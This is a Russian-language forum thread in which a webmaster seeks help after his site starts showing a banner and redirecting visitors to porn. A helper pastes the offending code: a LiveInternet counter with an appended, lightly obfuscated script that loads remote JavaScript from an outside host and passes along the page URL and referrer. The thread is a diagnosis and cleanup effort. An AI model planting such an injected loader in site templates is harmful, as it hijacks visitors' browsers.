rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 с www.fermer02.ru чтото не понятное твориться, пользователи жалуются что баннер проскакивает, вроде вскрыли и какой то скрипт воткнули, прошу посмотреть и подсказать в чем может быть проблема... Цитата Ссылка на сообщение Поделиться на других сайтах
Kolbaser 33 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Я не видел баннер, в коде вроде не видно. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 043 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Прямых зловредных кодов на странице нет, но сайт перекидывает на порно, и проблема есть, поэтому удаляйте все сторонние JS коды, реклама, флешки и прочее. Цитата Ссылка на сообщение Поделиться на других сайтах
rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 (изменено) Автор скрины этих скриптов, где сидят не могу понять, вроде изрыл, предположительно на форуме гдето.... кто подскажет чем их найти, поиск по коду не чего не дает Изменено 15 января 2010 пользователем rbhosting Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 043 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 О чем я и говорю, зловредный код, у вас во вставленном коде счетчика <!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<a href='http://www.liveinternet.ru/click;fermer_all' "+ "target=_blank><img src='http://counter.yadro.ru/hit;fermer_all?t18.15;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt='' title='LiveInternet: показано число просмотров за 24"+ " часа, посетителей за 24 часа и за сегодня' "+ "border='0' width='88' height='31'><\/a>") var lankru_html = '';lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" '; lankru_html += 'src="http://kn' + 'alru.ru/js.php?id=32240'; lankru_html += '&dd=3&url=' + encodeURIComponent(document.location); lankru_html += '&ref=' + encodeURIComponent(document.referrer); lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';document.write(lankru_html); //--></script><!--/LiveInternet--> [/code] Цитата Ссылка на сообщение Поделиться на других сайтах
rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор все устранил спасибо, а как теперь узнать каким образом его туда воткнули, где может быть дырка? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 043 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 все устранил спасибо, а как теперь узнать каким образом его туда воткнули, где может быть дырка? где он у вас стоял? в шаблоне? смотрите тех кто имеет доступ установке этого кода. Если стояло в шаблоне, значит возможно уязвим ваш доступ по FTP. Цитата Ссылка на сообщение Поделиться на других сайтах
rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор да стаял в главном шаблоне main.tpl Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.